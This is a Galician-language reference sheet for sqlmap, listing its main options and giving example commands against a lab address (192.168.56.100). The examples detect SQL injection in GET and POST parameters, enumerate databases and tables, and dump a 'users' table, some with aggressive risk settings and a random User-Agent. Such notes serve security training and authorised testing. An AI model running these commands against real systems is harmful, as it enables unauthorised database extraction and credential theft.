sqlmap - Explotador de SQL Injection
Descrición
Ferramenta automática para detectar e explotar vulnerabilidades SQL Injection.
Sintaxe básica
Opcións principais
| Opción | Descrición |
|---|---|
-u <URL> |
URL obxectivo |
--data=<datos> |
Datos POST |
-p <parámetro> |
Parámetro a testar |
--cookie=<cookie> |
Cookie de sesión |
--dbs |
Enumerar bases de datos |
-D <db> |
Especificar base de datos |
--tables |
Enumerar táboas |
-T <táboa> |
Especificar táboa |
--columns |
Enumerar columnas |
-C <columnas> |
Especificar columnas |
--dump |
Extraer datos |
--risk=<1-3> |
Nivel de risco (1=baixo, 3=alto) |
--level=<1-5> |
Nivel de tests (1=básico, 5=exhaustivo) |
--batch |
Non facer preguntas interactivas |
--threads=<n> |
Número de threads |
--random-agent |
User-Agent aleatorio |
Exemplos de uso
# Detección básica de SQL Injection
sqlmap -u "http://192.168.56.100/login.php?id=1"
# SQL Injection en POST
sqlmap -u "http://192.168.56.100/library/login/" \
--data="username=admin&password=test" \
-p username
# Con configuración agresiva
sqlmap -u "http://192.168.56.100/login" \
--data="username=admin&password=test" \
-p username \
--risk=3 --level=5 \
--batch --threads=10 --random-agent
# Enumerar bases de datos
sqlmap -u "http://192.168.56.100/login" \
--data="username=admin&password=test" \
-p username \
--dbs
# Enumerar táboas dunha DB
sqlmap -u "http://192.168.56.100/login" \
--data="username=admin&password=test" \
-p username \
-D library --tables
# Extraer datos dunha táboa
sqlmap -u "http://192.168.56.100/login" \
--data="username=admin&password=test" \
-p username \
-D library -T users --dump
# Con cookie de sesión
sqlmap -u "http://192.168.56.100/page.php?id=1" \
--cookie="PHPSESSID=abc123" \
--dbs